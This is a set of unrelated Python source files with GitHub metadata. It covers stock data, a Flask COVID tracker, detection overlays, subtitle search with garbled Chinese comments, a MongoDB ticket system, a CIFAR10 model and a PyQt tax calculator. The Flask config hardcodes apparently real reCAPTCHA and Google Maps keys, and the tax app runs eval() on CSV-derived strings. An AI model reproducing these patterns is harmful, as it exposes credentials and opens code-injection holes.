ฌๅธๆต้ๅธๅผ(ๅ
)', 'ไธๅธๅ
ฌๅธๆต้ๅธๅผ(ๅ
)',)
df[['SZ', 'CYB', 'ZXQY']] = df[['SZ', 'CYB', 'ZXQY']] / 100000000
return df
@classmethod
def get_avg_price(cls):
sh, sz, cyb, zxqy, szzb = self.get_overview_day()
sh_a = sh['A_trdAmt'].apply(
float) * 10000 / sh['A_trdVol'].apply(float)
sh_a.name = 'SHA'
sh_b = sh['B_trdAmt'].apply(
float) * 10000 / sh['B_trdVol'].apply(float)
sh_b.name = 'SHB'
sh_sh = sh['SH_trdAmt'].apply(
float) * 10000 / sh['SH_trdVol'].apply(float)
sh_sh.name = 'SH'
sz = sz['ๅนณๅ่ก็ฅจไปทๆ ผ๏ผๅ
๏ผ']
sz.name = 'SZ'
cyb = cyb['ๆปๆไบค้้ข(ๅ
)'] / cyb['ๆปๆไบค่กๆฐ']
cyb.name = 'CYB'
zxqy = zxqy['ๆปๆไบค้้ข(ๅ
)'] / zxqy['ๆปๆไบค่กๆฐ']
zxqy.name = 'ZXQY'
szzb = szzb['ๆปๆไบค้้ข(ๅ
)'] / szzb['ๆปๆไบค่กๆฐ']
szzb.name = 'SZZB'
df = pd.concat([sh_a, sh_b, sh_sh, sz, cyb, zxqy, szzb, ], axis=1)
return df
def load_old_file():
def read_file(file):
path = os.path.abspath(os.path.dirname(__file__))
df = pd.read_csv(os.path.join(path, file))
df.index = pd.DatetimeIndex(df.date)
del df['date']
return df
ShSeDb().save(read_file('files/se/sh_sse_day_overview.csv'))
SzSeDb().save(read_file('files/se/sz_day_overview.csv'))
CybSeDb().save(read_file('files/se/cyb_day_overview.csv'))
SzzbSeDb().save(read_file('files/se/szzb_day_overview.csv'))
ZxqySeDb().save(read_file('files/se/zxqy_day_overview.csv'))
for key in db.DfDb().keys():
print(key)
|
onecans/my
|
mystockdata/mystockdata/se.py
|
se.py
|
py
| 9,831
|
python
|
en
|
code
| 2
|
github-code
|
6
|
72226014269
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
import os
import datetime
from sqlalchemy.dialects.postgresql import ARRAY
app = Flask(__name__)
SECRET_KEY = os.urandom(32)
app.config['SECRET_KEY'] = SECRET_KEY
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///db.sqlite"
app.config['RECAPTCHA_USE_SSL'] = False
app.config['RECAPTCHA_PUBLIC_KEY'] = '6LfkN-EUAAAAAMEUxpQGg7DdGHqhz0eY0_2S5aKu'
app.config['RECAPTCHA_PRIVATE_KEY'] = '6LfkN-EUAAAAADXeLuqzoBOAg0F3f-b_oQEPiSzL'
app.config['RECAPTCHA_OPTIONS'] = {'theme': 'white'}
GOOGLEMAPS_KEY = "AIzaSyAsRuG0NnFmLNZlg6CWUTV8D2FA8gQo5xk"
app.config['GOOGLEMAPS_KEY'] = GOOGLEMAPS_KEY
db = SQLAlchemy(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
city = db.Column(db.String(100))
state = db.Column(db.String(100))
age = db.Column(db.Integer)
symptoms = db.Column(db.String(), default=[])
ip_address = db.Column(db.String(255))
tested = db.Column(db.String(255))
in_contact = db.Column(db.String(255))
created_date = db.Column(db.DateTime, default=datetime.datetime.utcnow)
coordinates = db.Column(db.String(255))
def __init__(self, city, state, age, symptoms, ip_address, tested, in_contact, coordinates):
self.city = city
self.state = state
self.age = age
self.symptoms = symptoms
self.ip_address = ip_address
self.tested = tested
self.in_contact = in_contact
self.coordinates = coordinates
def __repr__(self):
return "<Location %r>" % (self.location)
# db.drop_all()
db.create_all()
|
dananguyenucsb/ithinkihavecovid-19
|
model.py
|
model.py
|
py
| 1,606
|
python
|
en
|
code
| 1
|
github-code
|
6
|
20972559660
|
import torch
from tools.image import transforms, cv
from tools.image.index_map import default_map
from tools import tensor
def to_rgb(hex):
return ((hex >> 16) & 255, (hex >> 8) & 255, (hex >> 0) & 255)
def draw_box(image, box, scale=1.0, name=None, confidence=None, thickness=2, color=(255, 0, 0), text_color=None):
text_color = text_color or color
image = cv.rectangle(image, box[:2], box[2:], color=color, thickness=int(thickness * scale))
if not (name is None):
image = cv.putText(image, name, (box[0], box[1] + int(8 * scale)), scale = 0.7 * scale, color=text_color, thickness=int(1*scale))
if not (confidence is None):
str = "{:.2f}".format(confidence)
image = cv.putText(image, str, (box[0], box[3] - 2), scale = 0.7 * scale, color=text_color, thickness=int(1*scale))
return image
def overlay(eval, mode='target', threshold = 0.5, scale=1.0, classes=None):
image = eval.image.clone()
def overlay_prediction():
for detection in eval.detections._sequence():
if detection.confidence < threshold:
break
label_class = classes[detection.label]
draw_box(image, detection.bbox, scale=scale, confidence=detection.confidence, name=label_class.name, color=to_rgb(label_class.colour))
def overlay_target():
for target in eval.target._sequence():
label_class = classes[target.label]
draw_box(image, target.bbox, scale=scale, name=label_class.name, color=to_rgb(label_class.colour))
def overlay_anchors():
overlay_target()
for anchor in eval.anchors:
label_class = classes[anchor.label]
draw_box(image, anchor.bbox, scale=scale, color=to_rgb(label_class.colour), thickness=1)
def overlay_matches():
unmatched = dict(enumerate(eval.target._sequence()))
# print(unmatched)
for m in eval.matches:
if m.confidence < threshold: break
if m.match is not None:
k, _ = m.match
del unmatched[k]
for (i, target) in enumerate(eval.target._sequence()):
label_class = classes[target.label]
color = (255, 0, 0) if i in unmatched else (0, 255, 0)
draw_box(image, target.bbox, scale=scale, name=label_class.name, color=color)
for m in eval.matches:
if m.confidence < threshold: break
color = (255, 0, 0)
if m.match is not None:
color = (0, 255, 0)
label_class = classes[m.label]
draw_box(image, m.bbox, scale=scale, color=color, confidence=m.confidence, name=label_class.name, thickness=1)
target = {
'matches' : overlay_matches,
'prediction' : overlay_prediction,
'target' : overlay_target
}
if mode in target:
target[mode]()
if eval.debug is not None:
image = cv.blend_over(image, eval.debug)
cv.putText(image, eval.id, (0, int(24 * scale)), scale = 2*scale, color=(64, 64, 192), thickness=int(2*scale))
cv.putText(image, "mAP@0.5 " + str(eval.mAP), (0, int(48 * scale)), scale = 2*scale, color=(64, 64, 192), thickness=int(2*scale))
return image
def overlay_batch(batch, mode='target', scale=1.0, threshold = 0.5, cols=6, classes=None):
images = []
for eval in batch:
images.append(overlay(eval, scale=scale, mode=mode, threshold=threshold, classes=classes))
return tensor.tile_batch(torch.stack(images, 0), cols)
|
oliver-batchelor/detection
|
detection/display.py
|
display.py
|
py
| 3,548
|
python
|
en
|
code
| 0
|
github-code
|
6
|
21712175054
|
# -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand, CommandError
from optparse import make_option
from ...scraper import Scrap
class Command(BaseCommand):
option_list = BaseCommand.option_list + (make_option(
'--url',
action='store',
dest='url',
help='Subject of the email'),)
def handle(self, *args, **options):
#try:
Scrap(options.get('url'))
#except:
# raise CommandError('Broken does not exist')
|
jms/FlyNi-API
|
flyni_api/flyni/management/commands/get_data.py
|
get_data.py
|
py
| 500
|
python
|
en
|
code
| 0
|
github-code
|
6
|
73364821308
|
# ้่ฟ่ฏปๅssr-> txt็ๆไปถไธญๆฅๆพๅฏนๅบ็ๆๅญ็ๆฎต่ๅฏผๅบๅฏนๅบ็ๆถ้ดๆณ
"""
1. ่ฏปๅๆไปถ
1.1 ่พๅ
ฅ้่ฆๆฅๆพ็็ฑปๅ๏ผๅ
ๆฌ๏ผๅญๅน๏ผ
1.2 ่พๅ
ฅ้่ฆๆฅๆพ็ๆไปถ
1.3 ่ฏปๅๅฏนๅบๆไปถ
2. ่พๅ
ฅ้่ฆๆฅๆพ็ๆๅญๅ
ๅฎน
2.1 ๅๆถๆฅๆพ3ไธช่ฏ
3. ่ฟ่ก่ชๅจๅๆฅๆพๅฏนๅบ็ๅ
ๅฎน
3.1 ่ฟ่กๅๆถๆฅๆพ1.0็ๆฌ,้ๅฏน3ไธช่ฏ่ฟ่กๅไธๅน้
4. ่พๅบๅฏนๅบ็ๅ
ๅฎน็ๆถ้ดๆณ
4.1 ๆถ้ดๆณ่ๅ
4.2 ่พๅบๅฏนๅบ็ๆไปถ
"""
def zimu_time(search_letter_list,file_name,sum_time):
# 1.0 ่ฏปๅๆฌ้กน็ฎไธญ็ๆไปถ
f = open(file_name,"r",encoding='utf-8')
# 2.1 ๅๆถๆฅๆพ3ไธช่ฏใ
pp_list = search_letter_list # ๆฅๆพ่ฏๅ่กจ
pp_num = len(pp_list) # ่ฆๆฅๆพ่ฏ็ๆฐ้
pp_num_list = [0 for a in range(pp_num)] # ๅฏนๅบๅน้
่ฏๆฐ้่ฎกๆฐ
buffer_form = [] # ๆฏไธไธช้จๅ็ๆๆฌ็็ผๅญๅ่กจ
count_txt = 0 # ๆฏไธไธช้จๅ็ๆๆฌ็็ผๅฒ่ฎกๆฐๅจ
# ๆฏไธชๆ็ดขๅ
ณ้ฎ่ฏๅฏนๅบ็ๆถ้ดๆณ็ผๅญๅ้
buffer_search = []
for search_num in range(pp_num):
buffer_search.append([])
# 3.1 ่ฟ่กๅๆถๆฅๆพ1.0็ๆฌ,้ๅฏน3ไธช่ฏ่ฟ่กๅไธๅน้
for each_line in f:
if count_txt == 4:
for pp_num_s in range(pp_num):
if pp_list[pp_num_s] in buffer_form[2]:
buffer_search[pp_num_s].append(buffer_form[1])
pp_num_list[pp_num_s] += 1
buffer_form.clear()
count_txt = 0
# ่ฎฐๅฝๆฏไธช้จๅๆๆฌๅ่ฎกๆฐๅจ
buffer_form.append(each_line)
count_txt += 1
# 4.่พๅบๅฏนๅบ็ๅ
ๅฎน็ๆถ้ดๆณๅณๅฏนๅบๅ
ๅฎน
# 4.1 ๆถ้ดๆณ่ๅ
time_stamp_list = time_stamp_polymerization(pp_num,pp_num_list, buffer_search,sum_time)
#print(time_stamp_list)
# print(buffer_search,pp_num_list)
#4.2 ่พๅบๅฏนๅบ็ๆไปถ
print('\nๆฅๆพๅฎๆ\n็ปๆๅจresultๆไปถๅคนไธญใ\nๆไปถๅไธบ๏ผๅญๅน_โๆฅๆพ่ฏโ_โๅน้
ๆฐ้โ')
return time_stamp_list
# 4.1 ๆถ้ดๆณ่ๅๅฝๆฐ
def time_stamp_polymerization(search_number,search_count,buffer_search,sum_time):
time_polymerization_mark_list = []
for letter_number in range(search_number):
time_polymerization_mark = [0 for a in range(search_count[letter_number])]
time_polymerization_mark_list.append(time_polymerization_mark)
# ๅฏนๅญๅนๆถ้ดๆณๆ ผๅผๅค็ไปฅๅ่ๅๆ ่ฎฐ
for letter_number in range(search_number):
# ๅฏนๅญๅน็ๆถ้ดๆณๅค็
buffer_time = [[], []]
buffer_mark_count =1
for timestamp_str in buffer_search[letter_number]:
timestamp_start = int(timestamp_str[0:2]) * 3600 + int(timestamp_str[3:5]) * 60 + int(timestamp_str[6:8])
timestamp_end = int(timestamp_str[-13:-11]) * 3600 + int(timestamp_str[-10:-8]) * 60 + int(
timestamp_str[-7:-5])
#print(timestamp_start,timestamp_end)
buffer_time[0].append(timestamp_start)
buffer_time[1].append(timestamp_end)
# ๅญๅนๆถ้ดๆณ่ๅๆ ็ญพๆ ๆณจ
buffer_time_count = len(buffer_time[0])
# print(buffer_time[0][0],buffer_time[0][1])
if buffer_time_count>=2:
for x in range(1,buffer_time_count):
if buffer_time[0][x] - buffer_time[1][x-1] < sum_time:
# print(buffer_time[1][x-1])
time_polymerization_mark_list[letter_number][x-1] = buffer_mark_count
time_polymerization_mark_list[letter_number][x] = buffer_mark_count
# print(buffer_mark_count)
else:
buffer_mark_count += 1
# ๅฏนๅญๅนๆถ้ดๆณ่ฟ่ก่ๅ
# print(time_polymerization_mark_list)
time_stamp_list = [[] for a in range(search_number)]
for letter_number in range(search_number):
result = {}
for index,kw in enumerate(time_polymerization_mark_list[letter_number]):
if kw not in result.keys():
result[kw] = [index]
else:
result.get(kw).append(index)
for k,v in result.items():
if (len(v) != 1)&(k!=0):
tamp_str = buffer_search[letter_number][v[0]][0:12] + '-->' + buffer_search[letter_number][v[-1]][-13:-2]
time_stamp_list[letter_number].append(tamp_str)
time_stamp_list[letter_number].append(str(len(v))+'\n')
return time_stamp_list
if __name__ == '__main__':
pass
|
ExplosiveElements/letter_time
|
zimu.py
|
zimu.py
|
py
| 4,494
|
python
|
en
|
code
| 0
|
github-code
|
6
|
8245327650
|
from pymongo import MongoClient
from fastapi import HTTPException
from datetime import datetime
class ModekenSystemManager:
def __init__(self, username, password):
self.client = MongoClient(f'mongodb://{username}:{password}@db.modeken-system.com:27017')
self.db = self.client['modeken-system']
self.collections = self.db['collections']
self.manager = {}
def new(self, item_type):
self.manager[f'{item_type}'] = Manager(self.db[f'tickets-{item_type}'], self.collections, item_type)
if not self.collections.find_one({'item_type': item_type}):
self.collections.insert_one({'item_type': item_type, 'count': 0})
return self.manager[f'{item_type}']
class CollectionManager:
def __init__(self, collections, item_type):
self.collections = collections
self.item_type = item_type
def add_collection(self):
if not self.collections.update_one({'item_type': self.item_type}, {'$inc': {'count':1}}):
raise HTTPException(status_code=500, detail='Internal Server Error')
def get_collection(self):
d = self.collections.find_one({'item_type': self.item_type})
if not d:
raise HTTPException(status_code=500, detail='Internal Server Error')
del d['_id']
del d['item_type']
return d
def reset_collection(self):
if not self.collections.update_one({'item_type': self.item_type}, {'$set': {'count':0}}):
raise HTTPException(status_code=500, detail='Internal Server Error')
class TicketManager:
def __init__(self, tickets):
self.tickets = tickets
self.last_ticket = 0
def get_tickets_wait(self, item_type):
data = []
for i in self.tickets.find({'status': 'wait'}):
del i['_id']
del i['status']
i['item_number'] = item_type + str(i['item_number'])
data.append(i)
return data
def get_tickets_ready(self, item_type):
data = []
for i in self.tickets.find({'status': 'ready'}):
del i['_id']
del i['status']
i['item_number'] = item_type + str(i['item_number'])
data.append(i)
return data
def get_tickets(self):
data = []
for i in self.tickets.find():
del i['_id']
data.append(i)
return data
def to_ready_ticket(self, item_number):
t = self.tickets.find_one({'$and': [{'item_number': item_number}, {'status': 'wait'}]})
if not t:
raise HTTPException(status_code=404, detail=f'Not Found: {item_number}')
time = t['created_time']
return self.tickets.update_one({'$and': [{'item_number': item_number}, {'status': 'wait'}]}, {'$set': {'status': 'ready'}}), time
def to_wait_ticket(self, item_number):
t = self.tickets.find_one({'$and': [{'item_number': item_number}, {'status': 'ready'}]})
if not t:
raise HTTPException(status_code=404, detail=f'Not Found: {item_number}')
time = t['created_time']
return self.tickets.update_one({'$and': [{'item_number': item_number}, {'status': 'ready'}]}, {'$set': {'status': 'wait'}}), time
def cancel_ticket(self, item_number):
t = self.tickets.find_one({'$and': [{'item_number': item_number}, {'status': 'wait'}]})
if not t:
raise HTTPException(status_code=404, detail=f'Not Found: {item_number}')
return self.tickets.update_one({'$and': [{'item_number': item_number}, {'status': 'wait'}]}, {'$set': {'status': 'cancel'}})
def delete_ticket(self, item_number):
t = self.tickets.find_one({'$and': [{'item_number': item_number}, {'status': 'ready'}]})
if not t:
raise HTTPException(status_code=404, detail=f'Not Found: {item_number}')
return self.tickets.update_one({'$and': [{'item_number': item_number}, {'status': 'ready'}]}, {'$set': {'status': 'delete'}})
def add_ticket(self):
self.last_ticket += 1
item_number = self.last_ticket
now = datetime.now().strftime('%H:%M')
data = {'item_number': item_number, 'status': 'wait', 'created_time': now}
if self.tickets.find_one({'item_number': item_number}):
return self.add_ticket()
else:
if not self.tickets.insert_one(data):
raise HTTPException(status_code=500, detail='Internal Server Error')
return item_number, now
def reset_tickets(self):
if not self.tickets.delete_many({}):
raise HTTPException(status_code=500, detail='Internal Server Error')
else:
self.last_ticket = 0
class Manager(CollectionManager, TicketManager):
def __init__(self, tickets, collections, item_type):
CollectionManager.__init__(self, collections, item_type)
TicketManager.__init__(self, tickets)
def delete_ticket(self, item_number):
super().delete_ticket(item_number)
super().add_collection()
|
tochiman/modeken-ticket-system
|
backend/src/mongo.py
|
mongo.py
|
py
| 5,068
|
python
|
en
|
code
| 0
|
github-code
|
6
|
74796405626
|
import torch
import torchvision
from torch import nn
from torch.nn import Sequential, Conv2d, MaxPool2d, Flatten, Linear
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
train_dataset = torchvision.datasets.CIFAR10(root="../dataset_CIFAR10", train=True, download=True,
transform=torchvision.transforms.ToTensor())
test_dataset = torchvision.datasets.CIFAR10(root="../dataset_CIFAR10", train=False, download=True,
transform=torchvision.transforms.ToTensor())
train_dataloader = DataLoader(dataset=train_dataset, batch_size=64, shuffle=True, drop_last=True)
class CIFAR10_Model(nn.Module):
def __init__(self):
super(CIFAR10_Model, self).__init__()
self.model = Sequential(Conv2d(3, 32, 5, stride=1, padding=2),
MaxPool2d(2),
Conv2d(32, 32, 5, stride=1, padding=2),
MaxPool2d(2),
Conv2d(32, 64, 5, stride=1, padding=2),
MaxPool2d(2),
Flatten(),
Linear(1024, 64),
Linear(64, 10))
def forward(self, x):
output = self.model(x)
return output
model1 = CIFAR10_Model()
print(model1)
input = torch.ones(64, 3, 32, 32)
print(input.shape)
output = model1(input)
print(output.shape)
writer = SummaryWriter("../logs/model")
writer.add_graph(model1, input)
writer.close()
|
ccbit1997/pytorch_learning
|
src/cifar10_model.py
|
cifar10_model.py
|
py
| 1,591
|
python
|
en
|
code
| 0
|
github-code
|
6
|
6250184169
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 19 12:46:12 2018
@author: CTF Team
"""
from PyQt5 import uic,QtCore, QtGui, QtWidgets
from PyQt5.QtCore import QSize, Qt
import CompanyTaxUI
import sys
import pandas as pd
import csv
import numpy as np
class ApplicationWindow(QtWidgets.QMainWindow):
def __init__(self):
super(ApplicationWindow, self).__init__()
self.ui = CompanyTaxUI.Ui_MainWindow()
self.ui.setupUi(self)
# Connects the calculate button in CompanyTaxUI to CompanyTaxSavingsApp.py
self.ui.calculate.clicked.connect(self.taxCalculate)
def taxCalculate(self):
# Gets the string input from company_netIncome
companySGDIncome = self.ui.company_netIncome.text()
# Checks if companySGDIncome is empty
if not companySGDIncome:
self.ui.list_top10.setColumnCount(1)
self.ui.list_top10.setHorizontalHeaderLabels(["Output"])
self.ui.list_top10.setRowCount(1)
self.ui.list_top10.horizontalHeaderItem(0).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeader().setSectionResizeMode(0, QtWidgets.QHeaderView.ResizeToContents)
self.ui.list_top10.setItem(0 , 0, QtWidgets.QTableWidgetItem("You have not inputted any SGD Net Income !"))
else:
# Gets the category input from list_companyindustry
selectedCategoryData = self.ui.list_companyindustry.currentText()
calCountriesTaxAmt = ApplicationWindow.taxComputation(companySGDIncome, selectedCategoryData)
# Gets the option 1 - 5 to indicate the option to generate the tax output
if self.ui.option1.isChecked():
# Filter countries that have 0% tax rates for the respective tax rates
# Looking at 0 index value for national + branch rate
filteredCountries1 = {k:v for k, v in calCountriesTaxAmt.items() if v[0] > 0}
minimumTaxCountry1 = min(filteredCountries1.items(), key = lambda x : x[1][0])
# Set ui list to the following parameters for the required output for option 5
self.ui.list_top10.setColumnCount(3)
self.ui.list_top10.setHorizontalHeaderLabels(["Country", "Tax Amount", "Tax Option #"])
self.ui.list_top10.setRowCount(1)
self.ui.list_top10.horizontalHeaderItem(0).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(1).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(2).setTextAlignment(Qt.AlignLeft)
# Setting output for option 1
self.ui.list_top10.setItem(0 , 0, QtWidgets.QTableWidgetItem(minimumTaxCountry1[0]))
value = '%.3f' % minimumTaxCountry1[1][0]
self.ui.list_top10.setItem(0 , 1, QtWidgets.QTableWidgetItem(value))
self.ui.list_top10.setItem(0 , 2, QtWidgets.QTableWidgetItem("Tax Option 1"))
elif self.ui.option2.isChecked():
# Looking at index 1 value for min tax
filteredCountries2 = {k:v for k, v in calCountriesTaxAmt.items() if v[1] > 0}
minimumTaxCountry2 = min(filteredCountries2.items(), key = lambda x: x[1][1])
self.ui.list_top10.setColumnCount(3)
self.ui.list_top10.setHorizontalHeaderLabels(["Country", "Tax Amount", "Tax Option #"])
self.ui.list_top10.setRowCount(1)
self.ui.list_top10.horizontalHeaderItem(0).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(1).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(2).setTextAlignment(Qt.AlignLeft)
# Setting output for option 2
self.ui.list_top10.setItem(0 , 0, QtWidgets.QTableWidgetItem(minimumTaxCountry2[0]))
value = '%.3f' % minimumTaxCountry2[1][1]
self.ui.list_top10.setItem(0 , 1, QtWidgets.QTableWidgetItem(value))
self.ui.list_top10.setItem(0 , 2, QtWidgets.QTableWidgetItem("Tax Option 2"))
elif self.ui.option3.isChecked():
# Looking at index 2 value for progressive tax
filteredCountries3 = {k:v for k, v in calCountriesTaxAmt.items() if v[2] > 0}
minimumTaxCountry3 = min(filteredCountries3.items(), key = lambda x: x[1][2])
self.ui.list_top10.setColumnCount(3)
self.ui.list_top10.setHorizontalHeaderLabels(["Country", "Tax Amount", "Tax Option #"])
self.ui.list_top10.setRowCount(1)
self.ui.list_top10.horizontalHeaderItem(0).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(1).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(2).setTextAlignment(Qt.AlignLeft)
# Setting output for option 3
self.ui.list_top10.setItem(0 , 0, QtWidgets.QTableWidgetItem(minimumTaxCountry3[0]))
value = '%.3f' % minimumTaxCountry3[1][2]
self.ui.list_top10.setItem(0 , 1, QtWidgets.QTableWidgetItem(value))
self.ui.list_top10.setItem(0 , 2, QtWidgets.QTableWidgetItem("Tax Option 3"))
elif self.ui.option4.isChecked():
# Looking at index 3 value for category tax
filteredCountries4 = {k:v for k, v in calCountriesTaxAmt.items() if v[3] > 0}
# If Category is not inputted
if bool(filteredCountries4) == False :
self.ui.list_top10.setColumnCount(1)
self.ui.list_top10.setHorizontalHeaderLabels(["Output"])
self.ui.list_top10.setRowCount(1)
self.ui.list_top10.horizontalHeaderItem(0).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeader().setSectionResizeMode(0, QtWidgets.QHeaderView.ResizeToContents)
self.ui.list_top10.setItem(0 , 0, QtWidgets.QTableWidgetItem("You have not chosen any category !"))
# Else shows the category data
else:
minimumTaxCountry4 = min(filteredCountries4.items(), key=lambda x: x[1][3])
self.ui.list_top10.setColumnCount(3)
self.ui.list_top10.setHorizontalHeaderLabels(["Country", "Tax Amount", "Tax Option #"])
self.ui.list_top10.setRowCount(1)
self.ui.list_top10.horizontalHeaderItem(0).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(1).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(2).setTextAlignment(Qt.AlignLeft)
# Setting output for option 4
self.ui.list_top10.setItem(0 , 0, QtWidgets.QTableWidgetItem(minimumTaxCountry4[0]))
value = '%.3f' % minimumTaxCountry4[1][3]
self.ui.list_top10.setItem(0 , 1, QtWidgets.QTableWidgetItem(value))
self.ui.list_top10.setItem(0 , 2, QtWidgets.QTableWidgetItem("Tax Option 3"))
elif self.ui.option5.isChecked():
# Loops through calCountrieTaxAmt and store least tax amount and index as a tuple for key countryName
topTenCountriesLowestTaxes = {}
for value in calCountriesTaxAmt.items():
val = min((x for x in value[1] if x > 0), default = 0)
index = value[1].index(val)
topTenCountriesLowestTaxes[value[0]] = (val,index)
# Filters countries with 0 values
filteredCountries5 = {k:v for k, v in topTenCountriesLowestTaxes.items() if v[0] > 0}
minimumTaxCountry5 = sorted(filteredCountries5.items(), key=lambda x:x[1])
self.ui.list_top10.setColumnCount(3)
self.ui.list_top10.setHorizontalHeaderLabels(["Country", "Tax Amount", "Tax Option #"])
self.ui.list_top10.setRowCount(10)
self.ui.list_top10.horizontalHeaderItem(0).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(1).setTextAlignment(Qt.AlignLeft)
self.ui.list_top10.horizontalHeaderItem(2).setTextAlignment(Qt.AlignLeft)
# Setting the top 10 least minimum tax and their options onto the output
for row in range(10):
self.ui.list_top10.setItem(row, 0, QtWidgets.QTableWidgetItem(minimumTaxCountry5[row][0]))
value = '%.3f' % minimumTaxCountry5[row][1][0]
self.ui.list_top10.setItem(row , 1, QtWidgets.QTableWidgetItem(value))
option = minimumTaxCountry5[row][1][1] + 1
option = "Tax Option " + '%.f' % + option
self.ui.list_top10.setItem(row, 2, QtWidgets.QTableWidgetItem(option))
# Convert SGD Net Income to USD Net Income
def convertSGDToUSD(companySGDIncome):
usdIncome = companySGDIncome * 0.75
return usdIncome
# Generate dictionary with key as Country and tuple with 4 spaces containing the different tax rates
def generateTaxForOptions(taxData, companyUSDIncome, companyCode):
countryTaxAmount = {}
for row in taxData.itertuples(index=False, name="None"):
# Initialize 4 taxes amount to be stored
# 1st tax amount is normal rate + branch rate
# 2nd tax amount is minimum tax rate
# 3rd tax amount is progressive tax rate
# 4th tax amount is pertaining to the specific type of industry
differentTaxAmount = [0,0,0,0]
# 1st Tax
# Finding the tax in USD for tax amount # 1 with normal rate + branch rate
differentTaxAmount[0] = round(companyUSDIncome * (row[1] + row[8]), 3)
# 2nd Tax
# Find the tax in USD for tax amount # 2 with minimum tax rate
differentTaxAmount[1] = round(companyUSDIncome * (row[4]), 3)
# 3rd Tax
# If native currency is not in USD, find the tax in USD and convert to native currency for progressive tax computation
nativeCurrency = companyUSDIncome
if row[2] != "USD":
nativeCurrency = (1.0 / row[3]) * nativeCurrency
# Evaluates for fields that are not empty in ProgressiveTaxRate
if row[7]:
# Split by , for progressive tax condition
progressiveTax = row[7].split(',')
# For loop inside the progressiveTax and split by white space
conditionStatement = [x.split() for x in progressiveTax]
# For loop through the condition statement for each list of conditions
for x in conditionStatement:
# If value is present, break out of loop
valuePresent = False
# Round off native currency to 3 decimal places and declare it as a string
roundedNativeCurrency = round(nativeCurrency, 3)
strRoundedNativeCurrency = '%.3f' % roundedNativeCurrency
# Use if condition to check for the length of the list of conditionStatement
if len(x) == 5:
# Evaluate the conditions before final statement
lowerBound = x[0]
evaluationCondition = x[1]
upperBound = x[2]
taxPercentage = x[4]
# Use eval function to test the test case
lowerBoundStatement = "> " + lowerBound
upperBoundStatement = evaluationCondition + " " + upperBound
# 1st condition to check if figure is bigger than amount
lowerCondition = strRoundedNativeCurrency + " " + lowerBoundStatement
# 2nd condition to check if figure is smaller than or equal to amount
upperCondition = strRoundedNativeCurrency + " " + upperBoundStatement
# Checks if 1st and 2nd condition is fulfilled to know if nativeCurrency falls within this range
if (eval(lowerCondition)) and (eval(upperCondition)):
nativeCalculatedTax = roundedNativeCurrency * float(taxPercentage)
# Calculate back the amount in USD
USDCalTax1 = nativeCalculatedTax * (row[3])
USDCalTax1 = round(USDCalTax1, 3)
# Assign the CalTax into differentTaxAmount
differentTaxAmount[2] = USDCalTax1
valuePresent = True
break
if (valuePresent == True):
break
elif len(x) == 4:
# Evaluate the conditions for final statement
lastEvaluationCondition = x[0]
lastLowerBound = x[1]
lastTaxPercentage = x[3]
# last condition to check if figure is bigger than last lower bound
lastLowerBoundStatement = lastEvaluationCondition + " " + lastLowerBound
# Adding strRoundedNativeCurrency to lastCondition
lastCondition = strRoundedNativeCurrency + " " + lastLowerBoundStatement
# Checks if last condition is fulfilled
if eval(lastCondition):
nativeCalculatedTax = roundedNativeCurrency * float(lastTaxPercentage)
# Calculate back the amount in USD
USDCalTax2 = nativeCalculatedTax * (row[3])
USDCalTax2 = round(USDCalTax2, 3)
# Assign the CalTax into differentTaxAmount
differentTaxAmount[2] = USDCalTax2
valuePresent = True
break
# 4th Tax
# Calculates the tax amount if categoryTaxCondition1 fulfils the companyCode defined by the user
if row[9]:
if "," in row[9]:
# Split the string by , to get the string statement out
categoryStatement1 = row[9].split(',')
# For loop inside the categoryStatement and split by white space
categoryTaxCondition1 = [x.split() for x in categoryStatement1]
# For loop inside the tuple and retrieve dictCode for comparison and multiplication by assigned tax rate if it matches
for x in categoryTaxCondition1:
dictCode1 = x[0]
categoryTax1 = x[2]
if (companyCode == dictCode1):
categoryTaxAmount1 = companyUSDIncome * float(categoryTax1)
differentTaxAmount[3] = categoryTaxAmount1
break
# For loop inside the tuple and multiply by taxRate if it matches
else:
# Account for countries with only 1 type of category special tax rate
categoryTaxCondition2 = row[9].split()
dictCode2 = categoryTaxCondition2[0]
categoryTax2 = categoryTaxCondition2[2]
if (companyCode == dictCode2):
categoryTaxAmount2 = companyUSDIncome * float(categoryTax2)
differentTaxAmount[3] = categoryTaxAmount2
# Assigning the countryName as key, the differentTaxAmount tuple as the value
countryTaxAmount[row[0]] = differentTaxAmount
return countryTaxAmount
# Generate dictionary with key as CategoryName and value as 3 characters code for category
def generateCategoryData(categoryData):
# Use list comprehension to assign key and data to categoryDict
categoryDict = {x['CategoryName']: x['CategoryCode'] for x in categoryData.to_dict(orient="records")}
return categoryDict
def taxComputation(companySGDIncome, selectedCategoryData):
# Load csv data into pandas and na values are not being evaluated as NaN
taxData = pd.read_csv('countryTax.csv', keep_default_na=False)
# Fill empty fields with blank spaces
taxData.fillna({'ProgressiveTaxRange':'', 'CategoryRate': ''})
# Load csv data for company category and load into companyDict dictionary
categoryData = pd.read_csv('categoryDict.csv', keep_default_na=False)
# Generate categoryDict for categoryData
categoryDict = ApplicationWindow.generateCategoryData(categoryData)
companyCode = categoryDict.get(selectedCategoryData)
companySGDIncome = float(companySGDIncome)
companyUSDIncome = ApplicationWindow.convertSGDToUSD(companySGDIncome)
# Assign countryName as key, and calculate the value for differentTaxAmount in option 1, 2, 3, 4 in USD
